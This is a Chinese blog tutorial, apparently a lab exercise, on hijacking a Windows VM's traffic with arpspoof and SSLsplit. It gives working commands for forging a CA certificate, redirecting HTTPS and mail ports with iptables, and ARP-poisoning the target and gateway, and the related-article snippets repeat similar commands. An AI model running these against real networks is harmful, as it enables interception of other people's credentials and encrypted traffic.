利用SSLsplit+arpspoof 实现ARP欺骗劫持流量

最新推荐文章于 2023-02-03 17:27:20 发布
最新推荐文章于 2023-02-03 17:27:20 发布
阅读量744 收藏 5
点赞数
分类专栏: 暑假第五周作业 文章标签: linux 运维 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63253040/article/details/126377822
版权

arp欺骗的原理

参考博客

讲的很详细,建议大家看看

 

准备

一台kali虚拟机,ip 192.168.33.129

一台win7虚拟机,ip 192.168.33.130

需要安装arpspoof,没有的话使用命令的时候会提示安装,这时候直接安装就行了

SSLsplit的功能

即在中间监听获取网络数据以便获取的有价值的信息实现攻击破坏的目的,即client-mid man-server,此处介绍的sslsplit可以作为mid man监听ssl信息及HTTP信息。http不做介绍仅仅实现代理功能,ssl实现代理的同时要与服务器建立连接,同时伪造证书与客户端建立连接,即双连接,依据获取的client信息再与服务器通信,从而实现明文数据监听。

所以我们需要先伪造证书

利用openssl生成证书私钥
openssl genrsa -out ca.key 2048
利用私钥签名生成证书
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
遇到停顿回车就行

可以看见在我/home/kali的目录下生成了ca.key 私钥文件和ca.crt证书文件

 

开启路由转发功能

sysctl -w net.ipv4.ip_forward=1 

echo 1 > /proc/sys/net/ipv4/ip_forward

上面两种都行

 开启路由转发,我们才能把劫持到的目标机的流量请求发送给网关,使目标机能上网,不开启的话目标机无法上网,可以达到断网的目的

设置iptables端口转发规则

iptables -t nat -F
清空当前表规则

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080 【#HTTP】
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443 【#HTTPS】
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 【#MSA】
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 【#SMTPS】
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 【#IMAPS】
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 【#POP3S】


使用下面命令显示刚才配置的规则
iptables -t nat -L #显示所有规则

 

Arp欺骗 ,截获目标主机的网络流量

先去看看目标主机的网关

arpspoof -i eth0 -t 目标IP -r 目标主机网关
arpspoof -i eth0 -t 192.168.33.130 -r 192.168.33.2

 

启动SSLsplit进行攻击

创建目录

mkdir -p test/logdir

侦听设定的端口

sslsplit -D -l connect.log -j /home/kali/test -S /home/kali/test/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

这里要注意目录

 

伪造成功后,目标机访问https的网站,会出现安全证书有问题

因为我这里已经试过了,所以出现的不是显示证书有问题

正常是会这样

 接受确定继续访问后就会劫持访问,访问信息就会被kali记录在connect.log里面

我开始是访问的https://www.baidu.com

 可以看见成功进行arp欺骗并用SSLsplit劫持流量信息

分析一个ARP欺骗的各种玩法博客

白塔河冲浪手
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最新kali之sslsplit
vanony的博客
01-25 987
描述:   透明的SSL / TLS拦截。   SSLsplit是用于对SSL / TLS加密的网络连接进行中间人攻击的工具。 旨在用于网络取证,应用程序安全性分析和渗透测试。   SSLsplit旨在透明地终止使用网络地址转换引擎重定向到该连接的连接。 然后,SSLsplit终止SSL / TLS并启动到原始目标地址的新SSL / TLS连接,同时记录传输的所有数据。 除了基于NAT的操作外,SSLsplit还支持静态目标并将SNI指示的服务器名称用作上游目标.SSLsplit纯粹是透明代理,不能充当在浏
SSL破解工具SSLsplit.zip
07-16
SSLsplit 是一个针对SSL/TLS加密的网络连接进行攻击,为网络取证和渗透测试的工具。它会终止SSL / TLS和启动一个新的连接到原来的目的地,记录所有传输的数据。它支持普通的TCP和SSL,HTTP和HTTPS,和IPv4和IPv6。为SSL和HTTPS,它生成并签署伪造X509v3证书上飞使用的原始凭证的主题DN和subjectAltName扩展。它支持服务器名称显示,RSA,DSA和ECDSA密钥,DHE 和ECDHE密码套件。如果私钥是可用的,它也可以使用现有的证书。 SSLsplit is a tool that performs man-in-the-middle attacks against SSL/TLS encrypted network connections for network forensics and penetration testing. It terminates SSL/TLS and initiates a new connection to the original destination, logging all data transmitted. It supports plain TCP and SSL, HTTP and HTTPS, and IPv4 and IPv6. For SSL and HTTPS, it generates and signs forged X509v3 certificates on-the-fly using the original certificate's subject DN and subjectAltName extension. It supports Server Name Indication, RSA, DSA, and ECDSA keys, and DHE and ECDHE cipher suites. It can also use existing certificates if the private key is available.
利用SSLsplit工具实现TLS/SSL中间人攻击 ARP欺骗
永远在奔跑的学习者
11-15 4629
SSL、TLS中间人攻击 利用方法: ARP地址欺骗 修改DHCP服务器 (存在就近原则) 手动修改网关 修改DNS设置 修改HOSTS文件【高于DNS】 ICMP、STP、OSPF 中间人攻击前提 【以下某一条符合则可】 客户端已经信任伪造证书颁发机构(安装其根证书) 攻击者控制了合法证书颁发机构(控制CA服务器,为自己颁发证书) 客户端程序禁止了显示证书错误告警信息 (程序员个人能力有限) ...
Kali有些程序的安装和配置(补充ARP欺骗
nszmsjhshs的博客
03-28 3442
第一个内容是补充上文ARP欺骗arpspoof的安装 下载方法: 先输入命令更新一下系统:apt-get update,接着输入命令下载安装arpspoof程序:apt-get install dsniff;然后查看是否下载成功输入命令:arpspoof ,查看已安装成功。 Kali配置root用户密码 首先登录普通用户 接着打开kali的终端,输入命令:sudo passwd root 进行修改 第一次和这个差不多,我这个已经设置过密码了;密码修改成功。可以切换用户,一些朋友可以不会
SSL_TLS 攻击原理解析
hl1293348082的专栏
03-25 2255
本文主要描述 HTTPS 中对于 ssl/tls 加密的攻击手法,什么是 HTTPS 呢?百度百科的解释如下: HTTPS(全称:Hyper Text Transfer Protocol over Secure Socket Layer),是以安全为目标的 HTTP 通道,简单讲是 HTTP 的安全版。即 HTTP 下加入 SSL 层,HTTPS 的安全基础是 SSL,因此加密的详细内容就需要 SSL。 0x01 知识铺垫 ssl/tls 用途 1、为实现 CIA (保密性, 完整性, 可用性)
sslsplit源码流程分析
weixin_44376670的博客
05-31 1237
概述 官网地址:https://www.roe.ch/SSLsplit https://github.com/droe/sslsplit SSLsplit是用于对 SSL / TLS 加密的网络连接进行中间人攻击的工具。用于网络取证,应用程序安全性分析和渗透测试中。SSLsplit是纯粹的透明代理,不能充当浏览器中配置的HTTP或SOCKS代理。SSLsplit支持SSL 3.0,TLS 1.0,TLS 1.1和TLS 1.2,以及可选的SSL 2.0。 对于HTTPS连接,SSLsplit会动态生成并签名
ArpSpoof-arp欺骗.rar
04-03
ArpSpoof-arp欺骗.rar》是一款专用于Windows系统的ARP欺骗工具,它涉及到了网络通信中的重要概念和安全问题。ARP(Address Resolution Protocol)即地址解析协议,是TCP/IP协议栈中的一个关键组件,主要负责将IP...
ensp加kali实现arp欺骗攻击
04-21
网络安全领域,ARP欺骗是一种常见的攻击手段,它利用了局域网中地址解析协议(ARP)的缺陷。本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网...
arpspoof.3.1.src.rar_Arpspoof_arp_arpspoof 3.1_arpspoof3
07-15
3. ARP欺骗逻辑:源代码中的核心部分是实现欺骗逻辑,包括选择目标主机、设置欺骗模式(如仅监听或双向欺骗)、以及如何处理欺骗过程中的异常情况。 4. 用户界面:Arpspoof提供了命令行界面,用户可以方便地指定...
arp欺骗工具arpspoof.pdf
06-18
arp断网工具,学会使用即可进行arp欺骗,新手入门学习文档。
arp欺骗原理实验
05-06
4. **实施ARP欺骗**:实验可能涉及使用各种工具,如ettercap、arpspoof等,这些工具可以自动化发送欺骗ARP包,使目标主机误认为攻击者的MAC地址是某个特定IP的正确MAC。 5. **检测和防护**:防止ARP欺骗的方法包括...
Arpspoof:用于 arpspoofing 的 Python 脚本
07-09
恶作剧 用python编写的一个简单的arpspoofing程序 #用法```sh python arpspoof.py -t -p -p ``` * 如果未指定目标,则会显示活动 IP 列表。 * 如果没有指定 proxy_server ,它将简单地充当 MITM * 默认端口为 80 依赖关系 Python 2.7 阴森森的 信号 ####注意:这仅用于教育目的。 我不对脚本所做的事情负责。
kali渗透姿式小汇总
Amire0x的小乐园
11-09 2375
一些常用的信息收集方法,工具可以在kali里面找
渗透测试-----arpspoof的安装
weixin_62693307的博客
02-03 2016
要保存并退出按 :wq即可(如果这样按了不行,就按 :wq!如果到了这一步还没解决,则说明你要改更新源,方法如下。退出后输入:sudo sysctl -p生效配置。第二步(在更新完系统后直接执行以下命令即可)第一步(这里先更新系统,输入以下命令即可)最后在输入arpspoof看是否有提示即可。再输入:vim /sources.list。如果出现问题,则按以下步骤去执行命令即可。先输入:cd /etc/apt。在kali中编辑vim文件。先进入文件后按i即可编辑。将更新源改为以下保存即可。
内网渗透(1)--arp欺骗攻击
azraelxuemo的博客
07-12 642
实验原理 安装依赖 apt-get install bridge-utils 配置本地无线网卡, 开启流量转发,实现连入的设备可以上网 首先关闭一些服务,防止影响 service NetworkManager stop airmon-ng check kill 插入网卡并启用 airmon-ng start wlan0 把网卡变成一个ap airbase-ng --essid “test-wifi” wlan0mon --essid就是指定之后我们wifi的名字..
虚拟机kali arpspoof 攻击
curious233的博客
01-22 1075
**一、**查找自己的ip ifconfig **二、**搜索和自己连接在同一局域网的ip fping -g 三、使用arpspoof进行攻击 arpspoof -i eth0 -t 192.168.1.39(想要攻击的ip) 192.168.1.1(被攻击地址的网关) 四、补充情况,kali中查找不到arpspoof(下载dsniff) apt install dsniff ssldump 下载完成后就可以使用arpspoof,相关基础操作 ...
中间人攻击SSL加密流量
Jeromeyoung
03-04 1534
中间人劫持https加密流量,对其进行解密查看明文内容。 原理:终端发送流量经过路由转发,流量被中间人劫持,直到中间人放回给服务器(中间人需具备与服务器端看起来差不多的条件) 攻击者位于客户端和服务器通信链路中进行的攻击方式: 1、ARP欺骗:(把中间人的mac地址当作网关,从而让流量流经中间人(伪造证书、解密加密信息等操作))——>欺骗终端设备,让网关误认为是中间人,从而得...
linux arpspoof命令,Kali Linux使用arpspoof命令进行断网攻击(ARP欺骗
weixin_42491664的博客
04-28 1954
(最近公务员考试复习彻底不在状态,晚上就开始玩玩kali虚拟机,不知道这个国考究竟是虐人仍是虐心!)kali使用arpspoof命令进行ARP欺骗。作法是获取目标主机IP镜像流量,再进行ARP欺骗。这次测试实在局域网中进行,使用kali虚拟机和Windows10物理机测试。最终效果是利用kali干扰物理机不能正常上网。————————————————————————————————nginx具体方...
ARP渗透与攻防(五)之Ettercap劫持用户流量
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-24 3070
EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。ettercap几乎是每个渗透测试人员必备的工具之一。
snort怎么使用预处理器arpspoof检测ARP欺骗
最新发布
04-24
Snort可以通过使用预处理器arpspoof来检测ARP欺骗。首先,您需要确保Snort有安装arpspoof预处理器。然后,需要在Snort的配置文件中指定该预处理器。在配置文件中,找到“preprocessor”部分并添加以下行: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值